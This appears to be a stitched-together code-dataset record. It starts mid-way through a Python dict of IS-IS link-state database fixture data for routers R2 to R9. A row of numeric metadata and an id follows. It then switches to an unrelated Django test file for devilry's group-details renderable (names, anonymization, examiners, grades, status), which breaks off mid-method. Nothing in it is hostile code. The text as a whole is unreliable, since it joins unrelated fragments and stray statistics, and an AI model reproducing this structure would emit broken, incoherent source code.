'extended_is_neighbor': {
'R3.01': {
'metric': 10,
'neighbor_id': 'R3.01',
},
'R5.02': {
'metric': 10,
'neighbor_id': 'R5.02',
},
'R5.03': {
'metric': 10,
'neighbor_id': 'R5.03',
},
},
'ipv4_addresses': ['5.5.5.5'],
'ipv6_addresses': ['2001:db8:5:5:5::5'],
'lsp_id': 'R5.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'16386': {
'attributes': '0',
'mt_id': '16386',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:4::/64': {
'ip_prefix': '2001:db8:10:4::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:5:5:5::5/128': {
'ip_prefix': '2001:db8:5:5:5::5',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R5.02': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R5.02',
},
},
'remaining_lifetime': 984,
'sequence': '0x0000034D',
},
'R5.02-00': {
'checksum': '0xA5B5',
'extended_is_neighbor': {
'R4.00': {
'metric': 0,
'neighbor_id': 'R4.00',
},
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
},
'lsp_id': 'R5.02-00',
'remaining_lifetime': 651,
'sequence': '0x0000034E',
},
'R5.03-00': {
'checksum': '0x9C89',
'extended_is_neighbor': {
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
},
'lsp_id': 'R5.03-00',
'remaining_lifetime': 897,
'sequence': '0x0000034F',
},
'R6.00-00': {
'checksum': '0xA52C',
'dynamic_hostname': 'R6',
'extended_ipv4_reachability': {
'10.3.6.0/24': {
'ip_prefix': '10.3.6.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'6.6.6.0/24': {
'ip_prefix': '6.6.6.0',
'metric': 1,
'prefix_len': '24',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.05': {
'metric': 40,
'neighbor_id': 'R3.05',
},
'R7.02': {
'metric': 40,
'neighbor_id': 'R7.02',
},
},
'ipv4_addresses': ['6.6.6.6'],
'lsp_id': 'R6.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:6:6:6::6/128': {
'ip_prefix': '2001:db8:6:6:6::6',
'metric': 1,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R7.00': {
'metric': 40,
'mt_id': '2',
'neighbor_id': 'R7.02',
},
},
'remaining_lifetime': 987,
'sequence': '0x000004B3',
},
'R7.00-00': {
'checksum': '0x425F',
'dynamic_hostname': 'R7',
'extended_ipv4_reachability': {
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.7.8.0/24': {
'ip_prefix': '10.7.8.0',
'metric': 40,
'prefix_len': '24',
'up_down': False,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'7.7.7.7/32': {
'ip_prefix': '7.7.7.7',
'metric': 1,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R5.03': {
'metric': 40,
'neighbor_id': 'R5.03',
},
'R7.02': {
'metric': 40,
'neighbor_id': 'R7.02',
},
},
'ipv4_addresses': ['7.7.7.7'],
'lsp_id': 'R7.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:77::/64': {
'ip_prefix': '2001:db8:10:77::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:7::/64': {
'ip_prefix': '2001:db8:10:7::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': False,
},
'2001:db8:7:7:7::7/128': {
'ip_prefix': '2001:db8:7:7:7::7',
'metric': 1,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R7.02': {
'metric': 40,
'mt_id': '2',
'neighbor_id': 'R5.03',
},
},
'remaining_lifetime': 787,
'sequence': '0x000004B6',
},
'R7.02-00': {
'checksum': '0x25F2',
'extended_is_neighbor': {
'R6.00': {
'metric': 0,
'neighbor_id': 'R6.00',
},
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
},
'lsp_id': 'R7.02-00',
'remaining_lifetime': 697,
'sequence': '0x000004B2',
},
},
2: {
'R2.00-00': {
'checksum': '0x4E40',
'dynamic_hostname': 'R2',
'extended_ipv4_reachability': {
'1.1.1.1/32': {
'ip_prefix': '1.1.1.1',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'10.1.2.0/24': {
'ip_prefix': '10.1.2.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.2.3.0/24': {
'ip_prefix': '10.2.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'2.2.2.2/32': {
'ip_prefix': '2.2.2.2',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.07': {
'metric': 10,
'neighbor_id': 'R3.07',
},
},
'ipv4_addresses': ['2.2.2.2'],
'ipv6_addresses': ['2001:db8:2:2:2::2'],
'lsp_id': 'R2.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:1::/64': {
'ip_prefix': '2001:db8:10:1::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:2::/64': {
'ip_prefix': '2001:db8:10:2::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:1:1:1::1/128': {
'ip_prefix': '2001:db8:1:1:1::1',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:2:2:2::2/128': {
'ip_prefix': '2001:db8:2:2:2::2',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R3.07': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R3.07',
},
},
'remaining_lifetime': 870,
'sequence': '0x00000351',
},
'R3.00-00': {
'checksum': '0xC91D',
'dynamic_hostname': 'R3',
'extended_ipv4_reachability': {
'10.2.3.0/24': {
'ip_prefix': '10.2.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.4.0/24': {
'ip_prefix': '10.3.4.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.5.0/24': {
'ip_prefix': '10.3.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.6.0/24': {
'ip_prefix': '10.3.6.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.4.5.0/24': {
'ip_prefix': '10.4.5.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 50,
'prefix_len': '24',
'up_down': True,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 60,
'prefix_len': '24',
'up_down': True,
},
'3.3.3.0/24': {
'ip_prefix': '3.3.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'4.4.4.4/32': {
'ip_prefix': '4.4.4.4',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'5.5.5.5/32': {
'ip_prefix': '5.5.5.5',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'6.6.6.0/24': {
'ip_prefix': '6.6.6.0',
'metric': 11,
'prefix_len': '24',
'up_down': True,
},
'7.7.7.7/32': {
'ip_prefix': '7.7.7.7',
'metric': 21,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.01': {
'metric': 10,
'neighbor_id': 'R3.01',
},
'R3.07': {
'metric': 10,
'neighbor_id': 'R3.07',
},
},
'ipv4_addresses': ['3.3.3.3'],
'ipv6_addresses': ['2001:db8:3:3:3::3'],
'lsp_id': 'R3.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:2::/64': {
'ip_prefix': '2001:db8:10:2::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:4::/64': {
'ip_prefix': '2001:db8:10:4::',
'metric': 20,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 20,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 50,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:77::/64': {
'ip_prefix': '2001:db8:10:77::',
'metric': 60,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:3:3:3::3/128': {
'ip_prefix': '2001:db8:3:3:3::3',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:4:4:4::4/128': {
'ip_prefix': '2001:db8:4:4:4::4',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:5:5:5::5/128': {
'ip_prefix': '2001:db8:5:5:5::5',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:6:6:6::6/128': {
'ip_prefix': '2001:db8:6:6:6::6',
'metric': 11,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:7:7:7::7/128': {
'ip_prefix': '2001:db8:7:7:7::7',
'metric': 21,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R3.07': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R3.07',
},
},
'remaining_lifetime': 618,
'sequence': '0x00000359',
},
'R3.01-00': {
'checksum': '0xF521',
'extended_is_neighbor': {
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
},
'lsp_id': 'R3.01-00',
'remaining_lifetime': 712,
'sequence': '0x0000034F',
},
'R3.07-00': {
'checksum': '0xC77A',
'extended_is_neighbor': {
'R2.00': {
'metric': 0,
'neighbor_id': 'R2.00',
},
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
},
'lsp_id': 'R3.07-00',
'remaining_lifetime': 1086,
'sequence': '0x00000351',
},
'R5.00-00': {
'checksum': '0xC9D4',
'dynamic_hostname': 'R5',
'extended_ipv4_reachability': {
'10.2.3.0/24': {
'ip_prefix': '10.2.3.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.3.4.0/24': {
'ip_prefix': '10.3.4.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.3.5.0/24': {
'ip_prefix': '10.3.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.6.0/24': {
'ip_prefix': '10.3.6.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'10.4.5.0/24': {
'ip_prefix': '10.4.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 50,
'prefix_len': '24',
'up_down': True,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 50,
'prefix_len': '24',
'up_down': True,
},
'3.3.3.0/24': {
'ip_prefix': '3.3.3.0',
'metric': 20,
'prefix_len': '24',
'up_down': True,
},
'4.4.4.4/32': {
'ip_prefix': '4.4.4.4',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'5.5.5.5/32': {
'ip_prefix': '5.5.5.5',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
'6.6.6.0/24': {
'ip_prefix': '6.6.6.0',
'metric': 21,
'prefix_len': '24',
'up_down': True,
},
'7.7.7.7/32': {
'ip_prefix': '7.7.7.7',
'metric': 11,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.01': {
'metric': 10,
'neighbor_id': 'R3.01',
},
'R5.03': {
'metric': 10,
'neighbor_id': 'R5.03',
},
},
'ipv4_addresses': ['5.5.5.5'],
'ipv6_addresses': ['2001:db8:5:5:5::5'],
'lsp_id': 'R5.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:2::/64': {
'ip_prefix': '2001:db8:10:2::',
'metric': 20,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:4::/64': {
'ip_prefix': '2001:db8:10:4::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 50,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:77::/64': {
'ip_prefix': '2001:db8:10:77::',
'metric': 50,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:3:3:3::3/128': {
'ip_prefix': '2001:db8:3:3:3::3',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:4:4:4::4/128': {
'ip_prefix': '2001:db8:4:4:4::4',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:5:5:5::5/128': {
'ip_prefix': '2001:db8:5:5:5::5',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:6:6:6::6/128': {
'ip_prefix': '2001:db8:6:6:6::6',
'metric': 21,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:7:7:7::7/128': {
'ip_prefix': '2001:db8:7:7:7::7',
'metric': 11,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R3.01': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R3.01',
},
},
'remaining_lifetime': 606,
'sequence': '0x00000353',
},
'R5.03-00': {
'checksum': '0xB6F8',
'extended_is_neighbor': {
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
},
'lsp_id': 'R5.03-00',
'remaining_lifetime': 642,
'sequence': '0x0000034E',
},
'R7.00-00': {
'checksum': '0x59EB',
'dynamic_hostname': 'R7',
'extended_ipv4_reachability': {
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.6.7.0/24': {
'ip_prefix': '10.6.7.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.7.8.0/24': {
'ip_prefix': '10.7.8.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 40,
'prefix_len': '24',
'up_down': True,
},
'7.7.7.7/32': {
'ip_prefix': '7.7.7.7',
'metric': 1,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R5.03': {
'metric': 40,
'neighbor_id': 'R5.03',
},
'R8.01': {
'metric': 40,
'neighbor_id': 'R8.01',
},
'R9.01': {
'metric': 40,
'neighbor_id': 'R9.01',
},
},
'ipv4_addresses': ['7.7.7.7'],
'lsp_id': 'R7.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:5::/64': {
'ip_prefix': '2001:db8:10:5::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:6::/64': {
'ip_prefix': '2001:db8:10:6::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:77::/64': {
'ip_prefix': '2001:db8:10:77::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:7::/64': {
'ip_prefix': '2001:db8:10:7::',
'metric': 40,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:7:7:7::7/128': {
'ip_prefix': '2001:db8:7:7:7::7',
'metric': 1,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R7.00': {
'metric': 40,
'mt_id': '2',
'neighbor_id': 'R8.01',
},
},
'remaining_lifetime': 926,
'sequence': '0x000004B5',
},
'R8.00-00': {
'checksum': '0x7758',
'dynamic_hostname': 'R8',
'extended_ipv4_reachability': {
'10.7.8.0/24': {
'ip_prefix': '10.7.8.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'8.8.8.8/32': {
'ip_prefix': '8.8.8.8',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R8.01': {
'metric': 10,
'neighbor_id': 'R8.01',
},
},
'ipv4_addresses': ['8.8.8.8'],
'ipv6_addresses': ['2001:db8:8:8:8::8'],
'lsp_id': 'R8.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:7::/64': {
'ip_prefix': '2001:db8:10:7::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:8:8:8::8/128': {
'ip_prefix': '2001:db8:8:8:8::8',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R8.01': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R8.01',
},
},
'remaining_lifetime': 1116,
'sequence': '0x0000034E',
},
'R8.01-00': {
'checksum': '0xF753',
'extended_is_neighbor': {
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
'R8.00': {
'metric': 0,
'neighbor_id': 'R8.00',
},
},
'lsp_id': 'R8.01-00',
'remaining_lifetime': 770,
'sequence': '0x0000034E',
},
'R9.00-00': {
'checksum': '0x6C98',
'dynamic_hostname': 'R9',
'extended_ipv4_reachability': {
'10.10.10.10/32': {
'ip_prefix': '10.10.10.10',
'metric': 20,
'prefix_len': '32',
'up_down': True,
},
'10.7.9.0/24': {
'ip_prefix': '10.7.9.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.9.10.0/24': {
'ip_prefix': '10.9.10.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'9.9.9.9/32': {
'ip_prefix': '9.9.9.9',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R9.01': {
'metric': 10,
'neighbor_id': 'R9.01',
},
},
'ipv4_addresses': ['9.9.9.9'],
'ipv6_addresses': ['2001:db8:9:9:9::9'],
'lsp_id': 'R9.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:10:10::10/128': {
'ip_prefix': '2001:db8:10:10:10::10',
'metric': 20,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
'2001:db8:10:7::/64': {
'ip_prefix': '2001:db8:10:7::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:9::/64': {
'ip_prefix': '2001:db8:10:9::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:9:9:9::9/128': {
'ip_prefix': '2001:db8:9:9:9::9',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R9.01': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R9.01',
},
},
'remaining_lifetime': 871,
'sequence': '0x0000034A',
},
'R9.01-00': {
'checksum': '0x5624',
'extended_is_neighbor': {
'R7.00': {
'metric': 0,
'neighbor_id': 'R7.00',
},
'R9.00': {
'metric': 0,
'neighbor_id': 'R9.00',
},
},
'lsp_id': 'R9.01-00',
'remaining_lifetime': 718,
'sequence': '0x00000352',
},
},
},
},
},
},
},
}
| 52.923305
| 81
| 0.228374
| 9,533
| 142,840
| 3.338928
| 0.037239
| 0.042884
| 0.035815
| 0.053723
| 0.881904
| 0.849325
| 0.820515
| 0.796858
| 0.752655
| 0.732799
| 0
| 0.188085
| 0.687896
| 142,840
| 2,698
| 82
| 52.942921
| 0.525897
| 0.00028
| 0
| 0.669409
| 0
| 0.010471
| 0.39319
| 0.012809
| 0
| 0
| 0.007578
| 0
| 0
| 1
| 0
| false
| 0.000748
| 0
| 0
| 0.002992
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c5327dac24757c452449d74b0c8770d76b59b39
| 14,298
|
py
|
Python
|
devilry/devilry_admin/tests/assignment/students/test_groupdetails.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
devilry/devilry_admin/tests/assignment/students/test_groupdetails.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
devilry/devilry_admin/tests/assignment/students/test_groupdetails.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import timedelta
import htmls
import mock
from django import test
from django.http import Http404
from django.utils import timezone
from django_cradmin import cradmin_testhelpers
from model_mommy import mommy
from devilry.apps.core import devilry_core_mommy_factories
from devilry.apps.core.models import Assignment, AssignmentGroup
from devilry.devilry_admin.views.assignment.students import groupdetails
from devilry.devilry_group import devilry_group_mommy_factories
from devilry.devilry_dbcache.customsql import AssignmentGroupDbCacheCustomSql
class TestGroupDetailsRenderable(test.TestCase):
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_name(self):
testgroup = mommy.make('core.AssignmentGroup')
mommy.make('core.Candidate',
assignment_group=testgroup,
relatedstudent__user__fullname='Test User',
relatedstudent__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.django-cradmin-listbuilder-itemvalue-titledescription-title').alltext_normalized)
def test_name_semi_anonymous_is_not_anonymized(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
mommy.make('core.Candidate',
assignment_group=testgroup,
relatedstudent__user__fullname='Test User',
relatedstudent__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.django-cradmin-listbuilder-itemvalue-titledescription-title').alltext_normalized)
def test_name_fully_anonymous_is_not_anonymized(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
mommy.make('core.Candidate',
assignment_group=testgroup,
relatedstudent__user__fullname='Test User',
relatedstudent__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.django-cradmin-listbuilder-itemvalue-titledescription-title').alltext_normalized)
def test_examiners(self):
testgroup = mommy.make('core.AssignmentGroup')
mommy.make('core.Examiner',
assignmentgroup=testgroup,
relatedexaminer__user__fullname='Test User',
relatedexaminer__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.devilry-cradmin-groupitemvalue-examiners-names').alltext_normalized)
def test_examiners_semi_anonymous(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
mommy.make('core.Examiner',
assignmentgroup=testgroup,
relatedexaminer__user__fullname='Test User',
relatedexaminer__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.devilry-cradmin-groupitemvalue-examiners-names').alltext_normalized)
def test_examiners_fully_anonymous(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
mommy.make('core.Examiner',
assignmentgroup=testgroup,
relatedexaminer__user__fullname='Test User',
relatedexaminer__user__shortname='testuser@example.com')
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Test User(testuser@example.com)',
selector.one('.devilry-cradmin-groupitemvalue-examiners-names').alltext_normalized)
def test_grade_students_can_see_points_false(self):
devilry_group_mommy_factories.feedbackset_first_attempt_published(
group__parentnode__students_can_see_points=False,
grading_points=1)
testgroup = AssignmentGroup.objects.first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Grade: passed (1/1)',
selector.one('.devilry-cradmin-groupitemvalue-grade').alltext_normalized)
def test_grade_students_can_see_points_true(self):
devilry_group_mommy_factories.feedbackset_first_attempt_published(
group__parentnode__students_can_see_points=True,
grading_points=1)
testgroup = AssignmentGroup.objects.first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(
value=testgroup, assignment=testgroup.assignment).render())
self.assertEqual(
'Grade: passed (1/1)',
selector.one('.devilry-cradmin-groupitemvalue-grade').alltext_normalized)
def test_status_is_corrected(self):
devilry_group_mommy_factories.feedbackset_first_attempt_published(
grading_points=1)
testgroup = AssignmentGroup.objects.annotate_with_is_corrected_count().first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertFalse(selector.exists('.devilry-cradmin-groupitemvalue-status'))
def test_status_is_waiting_for_feedback(self):
devilry_group_mommy_factories.feedbackset_first_attempt_unpublished(
group__parentnode=mommy.make_recipe('devilry.apps.core.assignment_activeperiod_start'))
testgroup = AssignmentGroup.objects.annotate_with_is_waiting_for_feedback_count().first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertEqual(
'Status: waiting for feedback',
selector.one('.devilry-cradmin-groupitemvalue-status').alltext_normalized)
self.assertFalse(selector.exists('.devilry-cradmin-groupitemvalue-grade'))
def test_status_is_waiting_for_deliveries(self):
devilry_group_mommy_factories.feedbackset_first_attempt_unpublished(
group__parentnode=mommy.make_recipe('devilry.apps.core.assignment_activeperiod_start',
first_deadline=timezone.now() + timedelta(days=2)))
testgroup = AssignmentGroup.objects.annotate_with_is_waiting_for_deliveries_count().first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertEqual(
'Status: waiting for deliveries',
selector.one('.devilry-cradmin-groupitemvalue-status').alltext_normalized)
self.assertFalse(selector.exists('.devilry-cradmin-groupitemvalue-grade'))
def test_grade_not_available_unless_corrected(self):
devilry_group_mommy_factories.feedbackset_first_attempt_unpublished()
testgroup = AssignmentGroup.objects.annotate_with_is_corrected_count().first()
